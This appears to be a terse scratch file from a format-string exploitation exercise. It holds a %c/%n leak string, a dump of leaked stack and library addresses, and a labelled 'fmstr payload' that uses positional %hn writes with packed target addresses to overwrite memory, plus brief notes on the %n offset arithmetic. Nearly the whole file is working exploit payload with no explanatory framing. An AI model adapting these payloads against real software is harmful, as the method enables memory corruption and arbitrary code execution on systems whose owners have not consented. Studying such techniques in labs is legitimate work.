AAA%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%n\
x88\x9e\xccM\xfd\x7f\x00\x00jK\xec#*\x7f\x00\x00\x90\x9e\xccM\xfd\x7f\x00\x00\xf3\xc1\x08$*\x7f\x00\x0
0\x98\x9e\xccM\xfd\x7f\x00\x00\x1fp\xec#*\x7f\x00\x00\xa0\x9e\xccM\xfd\x7f\x00\x00\xff\x01\x00\x00\x00
\x00\x00\x00\xa8\x9e\xccM\xfd\x7f\x00\x00\x92<\xfe#*\x7f\x00\x00\xb0\x9e\xccM\xfd\x7f\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\xb8\x9e\xccM\xfd\x7f\x00\x00tq\xed#*\x7f\x00\x00\xc0\x9e\xccM\xfd\x7f\x00\x00Z
\x00\x00\x00\x00\x00\x00\x00\xc8\x9e\xccM\xfd\x7f\x00\x00M8\xec#*\x7f\x00\x00


fmstr payload

'AAA%26c%67$hn%421c%68$hn%8685c%69$hn%70$hn%71$hn%1c%72$hn%17c%73$hn%10c%74$hn%5189c%75$hn%1093c%76$h
n%3800c%77$hn%9397c%78$hn%341c%79$hn%3510c%80$hn%81$hn%82$hn%83$hn%84$hn%85$hn%17097c%86$hn%15885c%87$
hn%88$hn%89$hn%90$hn%91$hn%92$hn%93$hn%94$hn%95$hn%96$hn%97$hn%98$hn%99$hn%100$hn%101$hn%102$hnaa\xc0\
x9e\xccM\xfd\x7f\x00\x00\xa0\x9e\xccM\xfd\x7f\x00\x00\x8a\x9e\xccM\xfd\x7f\x00\x00\x9a\x9e\xccM\xfd\x7
f\x00\x00\xca\x9e\xccM\xfd\x7f\x00\x00\xba\x9e\xccM\xfd\x7f\x00\x00\xaa\x9e\xccM\xfd\x7f\x00\x00\x92\x
9e\xccM\xfd\x7f\x00\x00\xc8\x9e\xccM\xfd\x7f\x00\x00\xa8\x9e\xccM\xfd\x7f\x00\x00\x88\x9e\xccM\xfd\x7f
\x00\x00\x98\x9e\xccM\xfd\x7f\x00\x00\xb8\x9e\xccM\xfd\x7f\x00\x00\x8c\x9e\xccM\xfd\x7f\x00\x00\x94\x9
e\xccM\xfd\x7f\x00\x00\x9c\x9e\xccM\xfd\x7f\x00\x00\xac\x9e\xccM\xfd\x7f\x00\x00\xbc\x9e\xccM\xfd\x7f\
x00\x00\xcc\x9e\xccM\xfd\x7f\x00\x00\x90\x9e\xccM\xfd\x7f\x00\x00\x8e\x9e\xccM\xfd\x7f\x00\x00\x96\x9e
\xccM\xfd\x7f\x00\x00\x9e\x9e\xccM\xfd\x7f\x00\x00\xa2\x9e\xccM\xfd\x7f\x00\x00\xa4\x9e\xccM\xfd\x7f\x
00\x00\xa6\x9e\xccM\xfd\x7f\x00\x00\xae\x9e\xccM\xfd\x7f\x00\x00\xb0\x9e\xccM\xfd\x7f\x00\x00\xb2\x9e\
xccM\xfd\x7f\x00\x00\xb4\x9e\xccM\xfd\x7f\x00\x00\xb6\x9e\xccM\xfd\x7f\x00\x00\xbe\x9e\xccM\xfd\x7f\x0
0\x00\xc2\x9e\xccM\xfd\x7f\x00\x00\xc4\x9e\xccM\xfd\x7f\x00\x00\xc6\x9e\xccM\xfd\x7f\x00\x00\xce\x9e\x
ccM\xfd\x7f\x00\x00



 '%position$n' = '%c'*(position-1) + '%n'

 %67$hn = %66
